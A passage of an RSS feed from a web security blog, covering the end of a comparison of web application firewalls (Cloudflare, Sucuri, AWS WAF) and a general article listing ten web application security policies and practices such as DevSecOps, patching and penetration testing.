kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Top-5-Web-Application-Firewall-In-2020---DigWalker---Mozilla-Firefox.jpg" class="kg-image" alt="Top 3 Web Application Firewall In 2020"></figure><p>Built for the modern enterprise architecture</p><p>An intelligent, integrated and scalable solution to protect your business-critical web applications from malicious attacks, with no changes to your existing infrastructure.</p><p>Cloudflare Web Application Firewall's intuitive dashboard enables users to build powerful rules through easy clicks and also provides Terraform integration. Every request to the WAF is inspected against the rule engine and the threat intelligence curated from protecting over 20 Million websites. Suspicious requests can be blocked, challenged or logged as per the needs of the user while legitimate requests are routed to the destination, agnostic of whether it lives on-premise or in the cloud. Analytics and Cloudflare Logs enable visibility into actionable metrics for the user.</p><p>Between $0/yr and Ask for Quote $/yr depending on business needs.</p><h2 id="sucuri-website-firewall"><a href="https://sucuri.net/">Sucuri Website Firewall</a></h2><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Web-Application-Firewall--WAF--Protection---Security--Sucuri---Google-Chrome.jpg" class="kg-image" alt="Top 3 Web Application Firewall In 2020"></figure><p>When it comes to web firewall comparison lists, <a href="https://geekflare.com/recommends/sucuri-waf/" rel="nofollow noopener noreferrer">Sucuri Website Firewall</a> is a serious contender. It offers protection from hackers trying to exploit OWASP Top 10 vulnerabilities, including SQLi, XSS, and CSRF.</p><p>It also includes mitigation of the Distribution Denial of Service (DDoS) attacks backed by continuous monitoring. Sucuri Website Firewall <strong>intercepts and inspects all incoming</strong> HTTP/HTTPS requests site.</p><p>Although it does not offer custom rules, it has a fast response policy for <strong>zero-day vulnerabilities</strong>. As and when the vulnerability is made public, Sucuri engineers patch your environment to block attacks trying to exploit that vulnerability.</p><p>Between $200/yr and $500/yr.</p><h1 id="aws-waf"><a href="https://aws.amazon.com/waf/features/">AWS WAF</a></h1><figure class="kg-card kg-image-card"><img src="https://digwalker.com/content/images/2020/05/Top-5-Web-Application-Firewall-In-2020--x.jpg" class="kg-image" alt="Top 3 Web Application Firewall In 2020"></figure><p>AWS WAF is a web application firewall that helps protect your web applications or APIs against common web exploits that may affect availability, compromise security, or consume excessive resources. AWS WAF gives you control over how traffic reaches your applications by enabling you to create security rules that block common attack patterns, such as SQL injection or cross-site scripting, and rules that filter out specific traffic patterns you define. You can get started quickly using Managed Rules for AWS WAF, a pre-configured set of rules managed by AWS or AWS Marketplace Sellers. The Managed Rules for WAF address issues like the OWASP Top 10 security risks. These rules are regularly updated as new issues emerge. AWS WAF includes a full-featured API that you can use to automate the creation, deployment, and maintenance of security rules.</p><p>With AWS WAF, you pay only for what you use. The pricing is based on how many rules you deploy and how many web requests your application receives. There are no upfront commitments.</p>]]></content:encoded></item><item><title><![CDATA[Web Security Policies and Processes]]></title><description><![CDATA[Web Security Policies and Processes]]></description><link>https://digwalker.com/web-security-policies-and-processes/</link><guid isPermaLink="false">5eb9867c3322733553ec065b</guid><dc:creator><![CDATA[qpicss]]></dc:creator><pubDate>Mon, 11 May 2020 17:16:43 GMT</pubDate><media:content url="https://digwalker.com/content/images/2020/05/website-3411281_640-1.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://digwalker.com/content/images/2020/05/website-3411281_640-1.jpg" alt="Web Security Policies and Processes"><p>Good planning is crucial to ensure that you have a solid strategy for web application security as an integral part of wider cybersecurity. This includes developing formal strategy documents, fostering a security-first culture throughout the organization, and documenting your web assets so you know what you’re working with.</p><h3 id="1-define-and-adopt-a-cybersecurity-framework">1. Define and Adopt a Cybersecurity Framework</h3><p>A formal policy document and strategy approach is a must for large organizations. To make sure you cover all the vital areas without reinventing the wheel, it’s a good idea to start with existing industry standards. Cybersecurity frameworks provide a detailed blueprint for developing your own policies. While they are far too extensive for most organizations, you can pick and mix to select a starting set of policies that works for you. See our article on cybersecurity frameworks in web application security to get started.</p><h3 id="2-make-security-everyone-s-business">2. Make Security Everyone’s Business</h3><p>Organizations can no longer afford to leave cybersecurity to just the security professionals, and this also applies to web application security. Just as IT security policies and practices should involve a wide cross-section of functions, so web app security should also be integrated into all stages of the development, operations, and testing process. This is the idea behind <a href="https://www.netsparker.com/blog/web-security/what-is-devsecops/" rel="noreferrer">DevSecOps</a> – an approach that embeds security practices into the combined development and operations processes of DevOps.</p><h3 id="3-know-your-web-assets">3. Know Your Web Assets</h3><p>A large organization can have hundreds or even thousands of web assets, including websites, web applications, web services, and web APIs. Even if you have only a handful of applications, they might be connecting to dozens of services and exposing their functionality via multiple interfaces. There might also be forgotten test and staging environments that are still live – but you still need to test every single point of web access. That’s why asset discovery is a crucial step in any cybersecurity program. Netsparker provides a web application discovery service to help you find your assets so you know exactly what you need to secure.</p><h2 id="security-in-web-application-development">Security in Web Application Development</h2><p>The traditional approach to securing a web application has been to develop first and test later. With the rapid pace of development of modern applications combined with the growing intensity of web application attacks, this is no longer workable. Security must be an integral part of the software development lifecycle. Automation has also become a practical necessity, especially when a small team has to secure multiple new and existing websites and applications.</p><h3 id="4-incorporate-security-into-software-development-practices">4. Incorporate Security into Software Development Practices</h3><p>It goes without saying that prevention is better than remediation – you don’t need to fix vulnerabilities that were never introduced in the first place. Security training for developers is crucial not just to minimize the number of security issues that make it into application code but also to involve developers in the security process from the very beginning. With the increasing cybersecurity skills gap, web security teams are often understaffed and overworked, so a proactive approach to securing web application takes the load off the security professionals and speeds up the whole development pipeline.</p><h3 id="5-fix-vulnerabilities-not-just-bugs">5. Fix Vulnerabilities, Not Just Bugs</h3><p>If you look at changes across the years in lists of common web security flaws such as the <a href="https://owasp.org/www-project-top-ten/" rel="noreferrer">OWASP Top 10</a> or <a href="https://cwe.mitre.org/top25/archive/2019/2019_cwe_top25.html" rel="noreferrer">CWE Top 25</a>, you will notice that some types of bugs keep coming back year after year: <a href="https://www.netsparker.com/blog/web-security/cross-site-scripting-xss/" rel="noreferrer">cross-site scripting (XSS)</a>, <a href="https://www.netsparker.com/blog/web-security/sql-injection-vulnerability/" rel="noreferrer">SQL injection</a>, <a href="https://www.netsparker.com/blog/web-security/csrf-cross-site-request-forgery/" rel="noreferrer">cross-site request forgery (CSRF)</a>, <a href="https://www.netsparker.com/blog/web-security/buffer-overflow-attacks/" rel="noreferrer">buffer overflows</a> – the list goes on. This is why communication and education are so important in web application security.</p><p>If developers treat vulnerabilities as just another bug to fix, it is likely they will make the same types of errors in the future. In effect, you will never run out of vulnerabilities, because new ones will appear just as quickly as existing ones are fixed. To see progress and build more secure applications, developers and security professionals need to work together to understand vulnerabilities and eliminate their root causes, not merely to fix bugs.</p><h3 id="6-automate-and-integrate">6. Automate and Integrate</h3><p>At any one time, large organizations can have many hundreds of web assets to maintain and multiple new applications in development. This can mean thousands of vulnerabilities to identify, process, and fix. The only way to ensure web application security at that kind of scale is to automate everything that can be automated and integrate security tools directly into the software development lifecycle.</p><p>When this is done right, reliable reports of automatically verified vulnerabilities are loaded directly into the developers’ bug trackers and go straight to the fixing stage, bypassing the bottleneck of manual verification by the security team. Netsparker provides extensive integration capabilities that aid automation and allow security professionals to focus on issues that only a human can solve.</p><h2 id="secure-web-application-operations">Secure Web Application Operations</h2><p>The real security test starts when your application is deployed to the web. By choosing the right tools and processes, you can minimize the risk of a successful cyberattack and maintain a solid security posture.</p><h3 id="7-use-enterprise-grade-security-solutions">7. Use Enterprise-Grade Security Solutions</h3><p>Cybersecurity has always been a game of cat-and-mouse, with criminals keeping at least one step ahead of the security industry. By using a cutting-edge web vulnerability scanner, you can accurately find vulnerabilities and confidently address them. If developers can’t immediately fix a critical vulnerability, you can use a web application firewall (WAF) to temporarily block that attack vector until a fix is deployed. </p><h3 id="8-minimize-your-attack-surface-with-the-latest-web-technologies">8. Minimize Your Attack Surface with the Latest Web Technologies</h3><p>Even if your application code is secure, you still need to make sure the application is securely deployed and used. Many security measures exist to protect against specific types of attacks. For example, well-configured Content Security Policy (CSP) headers can stop many XSS attempts, while enforcing strong passwords can help to secure sensitive data and prevent data breaches caused by unauthorized access. On an operational level, you can use DDoS mitigation services to help protect your application against DDoS attacks.</p><h3 id="9-keep-up-to-date">9. Keep up to Date</h3><p>As in network security, it is good practice to have and follow a patching and update policy for your web application environments. A modern web application can rely on multiple components in several layers, and they all need to be up to date. If you maintain your own infrastructure, you might start with the web server, application server, and database server. If you run a CMS such as WordPress, keep track of its development and be sure to use the most recent version for maximum security.</p><p>If you develop your own applications, they are likely to use frameworks, JavaScript libraries, templates, styles, and other external resources that need to be updated to always include the latest security patches. Netsparker’s Technologies feature is a great tool to help you detect both active and unused technologies that are present in your environment.</p><h3 id="10-test-your-defenses">10. Test Your Defenses</h3><p>Even if you have a solid security process and use leading-edge vulnerability scanning solutions, attackers might still be able to find a weakness somewhere. Periodic manual penetration testing by experienced security professionals will help you identify attack vectors that don’t show up during automated scanning. For example, a real-life attacker might combine several minor weaknesses into a critical vulnerability.</p><p>Red team vs blue team security exercises are one way of identifying vulnerabilities and testing the organization’s defensive response. You can also run a bounty program to encourage white-hat hackers to test your defenses and report vulnerabilities before cyber criminals can exploit them.</p><!--kg-card-begin: html--><script async src="https://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- inBody -->
<ins class="adsbygoogle" style="display:block" data-ad-client="ca-pub-8205164940797312" data-ad-slot="5864405586" data-ad-format="auto" data-full-width-responsive="true"></ins>
<script>
     (adsbygoogle = window.adsbygoogle || []).push({});
</script>
<!--kg-card-end: html-->]]></content:encoded></item></channel></rss>